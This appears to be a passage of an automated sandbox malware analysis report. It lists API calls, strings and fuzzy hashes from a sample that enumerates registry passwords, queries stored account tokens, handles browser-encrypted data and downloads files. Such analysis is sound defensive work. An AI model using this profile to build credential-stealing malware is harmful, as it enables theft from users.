                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 040A6664
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 040A66D4
                        • InternetCloseHandle.WININET(00000000), ref: 040A6756
                        • InternetCloseHandle.WININET(00000000), ref: 040A6760
                        • InternetCloseHandle.WININET(00000000), ref: 040A676A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID:
                        • API String ID: 3074848878-0
                        • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                        • Instruction ID: 7e22a3d87c12983121780b17b36de42691523c7a3f1b50cf3889075a1a4cc556
                        • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                        • Instruction Fuzzy Hash: C6718C75A00218ABEB24DFE0CC48FEE77B5EB04704F148198E14ABB190DBB57A84CF91
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 040B92D3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID:
                        • API String ID: 2244384528-0
                        • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                        • Instruction ID: 6b16a37cccff49962315bd6a98712a3bd1f55fd9ec973b9e65a2f877f7999376
                        • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                        • Instruction Fuzzy Hash: 4C710DB9A40208ABDB14EFE4DD84FEEB7B9FF49704F109508F605A7290DB74A905CB61
                        APIs
                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                        • memset.MSVCRT ref: 0041716A
                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                        • sA, xrefs: 004172AE, 00417179, 0041717C
                        • sA, xrefs: 00417111
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: OpenProcesslstrcpymemset
                        • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 224852652-2614523144
                        • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                        • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                        • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                        • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 040B77A9
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040B77E6
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B786A
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040B7871
                        • wsprintfA.USER32 ref: 040B78A7
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$B
                        • API String ID: 1544550907-183544611
                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                        • Instruction ID: 159ca3a9698f71d2b5d43d5e1dc1bb1996bffaeb1b9fe1dc8ab86c9519679432
                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                        • Instruction Fuzzy Hash: 424191B1E40258EBDF10DF94CC45BEEBBB9EF48704F004199E545B7280E7756A84CBAA
                        APIs
                          • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                          • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                          • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                          • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                          • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                          • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                        • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                        • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                        • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                        • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                        • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                        • task.LIBCPMTD ref: 004076FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: :
                        • API String ID: 3191641157-3653984579
                        • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                        • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                        • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                        • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                        APIs
                        • lstrcpy.KERNEL32(?,?), ref: 040B1642
                          • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                          • Part of subcall function 040B94C7: StrStrA.SHLWAPI(?,?), ref: 040B94D3
                        • lstrcpy.KERNEL32(?,00000000), ref: 040B167E
                          • Part of subcall function 040B94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 040B94F7
                          • Part of subcall function 040B94C7: lstrlen.KERNEL32(?), ref: 040B950E
                          • Part of subcall function 040B94C7: wsprintfA.USER32 ref: 040B952E
                        • lstrcpy.KERNEL32(?,00000000), ref: 040B16C6
                        • lstrcpy.KERNEL32(?,00000000), ref: 040B170E
                        • lstrcpy.KERNEL32(?,00000000), ref: 040B1755
                        • lstrcpy.KERNEL32(?,00000000), ref: 040B179D
                        • lstrcpy.KERNEL32(?,00000000), ref: 040B17E5
                        • lstrcpy.KERNEL32(?,00000000), ref: 040B182C
                        • lstrcpy.KERNEL32(?,00000000), ref: 040B1874
                          • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                          • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                        • strtok_s.MSVCRT ref: 040B19B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                        • String ID:
                        • API String ID: 4276352425-0
                        • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                        • Instruction ID: b42f31b6a930764727ec01869ec122f0e6d9d87ce0f311c802961383ab5374ea
                        • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                        • Instruction Fuzzy Hash: 2771A6B2951118ABDB14EBB0DC88EEE7379AF54308F044598E24DB2150EF75BB84CFA5
                        APIs
                        • memset.MSVCRT ref: 00407314
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                        • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                        • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                          • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                        • task.LIBCPMTD ref: 00407555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                        • String ID: Password
                        • API String ID: 2698061284-3434357891
                        • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                        • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                        • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                        • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                        APIs
                        • lstrcatA.KERNEL32(?,024DCB38,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                        • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                        • lstrcatA.KERNEL32(?,?), ref: 00414820
                        • lstrcatA.KERNEL32(?,?), ref: 00414834
                        • lstrcatA.KERNEL32(?,024A9028), ref: 00414847
                        • lstrcatA.KERNEL32(?,?), ref: 0041485B
                        • lstrcatA.KERNEL32(?,024DD600), ref: 0041486F
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                          • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                          • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                          • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                          • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID: 0aA
                        • API String ID: 167551676-2786531170
                        • Opcode ID: 90fab53855280a57fda400dfd0302278240fe8fa9e8df30b63c428c3d2f2dbd2
                        • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                        • Opcode Fuzzy Hash: 90fab53855280a57fda400dfd0302278240fe8fa9e8df30b63c428c3d2f2dbd2
                        • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,024DC988,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,024DC988,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                        • __aulldiv.LIBCMT ref: 00418172
                        • __aulldiv.LIBCMT ref: 00418180
                        • wsprintfA.USER32 ref: 004181AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2886426298-3474575989
                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                        • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                        • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                        APIs
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                          • Part of subcall function 040A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                          • Part of subcall function 040A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 040A6376
                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 040A63AE
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 040A63F6
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 040A641A
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 040A6443
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 040A6471
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 040A64B0
                        • InternetCloseHandle.WININET(?), ref: 040A64BA
                        • InternetCloseHandle.WININET(00000000), ref: 040A64C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 4287319946-0
                        • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                        • Instruction ID: 1cca5b1dbf1713d4f5561f5e7f43ab984122ad15b7dd0a26216eedb7945c5ecf
                        • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                        • Instruction Fuzzy Hash: 8E516DB5A40218ABEB20DFA0CC44BEE77B9AB44705F048498B645B71C0DBB57A85CFA5
                        APIs
                        • memset.MSVCRT ref: 040B4FEE
                          • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                        • lstrcat.KERNEL32(?,00000000), ref: 040B5017
                        • lstrcat.KERNEL32(?,00421000), ref: 040B5034
                          • Part of subcall function 040B4B77: wsprintfA.USER32 ref: 040B4B93
                          • Part of subcall function 040B4B77: FindFirstFileA.KERNEL32(?,?), ref: 040B4BAA
                        • memset.MSVCRT ref: 040B507A
                        • lstrcat.KERNEL32(?,00000000), ref: 040B50A3
                        • lstrcat.KERNEL32(?,00421020), ref: 040B50C0
                          • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 040B4BD8
                          • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 040B4BEE
                          • Part of subcall function 040B4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 040B4DE4
                          • Part of subcall function 040B4B77: FindClose.KERNEL32(000000FF), ref: 040B4DF9
                        • memset.MSVCRT ref: 040B5106
                        • lstrcat.KERNEL32(?,00000000), ref: 040B512F
                        • lstrcat.KERNEL32(?,00421038), ref: 040B514C
                          • Part of subcall function 040B4B77: wsprintfA.USER32 ref: 040B4C17
                          • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 040B4C2C
                          • Part of subcall function 040B4B77: wsprintfA.USER32 ref: 040B4C49
                          • Part of subcall function 040B4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 040B4C85
                          • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,0064A524), ref: 040B4CB1
                          • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,00420FF8), ref: 040B4CC3
                          • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,?), ref: 040B4CD7
                          • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,00420FFC), ref: 040B4CE9
                          • Part of subcall function 040B4B77: lstrcat.KERNEL32(?,?), ref: 040B4CFD
                          • Part of subcall function 040B4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 040B4D13
                          • Part of subcall function 040B4B77: DeleteFileA.KERNEL32(?), ref: 040B4D98
                        • memset.MSVCRT ref: 040B5192
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID:
                        • API String ID: 4017274736-0
                        • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                        • Instruction ID: 27488f0d4fc5118f1d50d459215ec32695e7fee117e740e9eb8778ec41d4aa99
                        • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                        • Instruction Fuzzy Hash: 4F41D579B402146BEB10F7B0EC46FDD3738AB24709F404494A6C5760C0EEB967D88BA6
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 040B8397
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040B839E
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 040B83BF
                        • __aulldiv.LIBCMT ref: 040B83D9
                        • __aulldiv.LIBCMT ref: 040B83E7
                        • wsprintfA.USER32 ref: 040B8413
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: @
                        • API String ID: 2774356765-2766056989
                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                        • Instruction ID: a22e88d0b17f7b28569f29d8ec693109e4873de77bf0f5189eb367d052b1d69d
                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                        • Instruction Fuzzy Hash: D5214DB1E44219ABEB00DFD4CC49FEEB7B9FB44B04F104509F605BB280D77869008BA9
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                        • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                        • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                        • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 1440504306-1079375795
                        • Opcode ID: 81e398efcfbfc8fe05c3abd80452661048b9528cba03a89cf09ad618d51ebfe1
                        • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                        • Opcode Fuzzy Hash: 81e398efcfbfc8fe05c3abd80452661048b9528cba03a89cf09ad618d51ebfe1
                        • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: B
                        • API String ID: 1494266314-2248957098
                        • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                        • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                        • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                        • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                        APIs
                        • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                        • memset.MSVCRT ref: 00409EE8
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
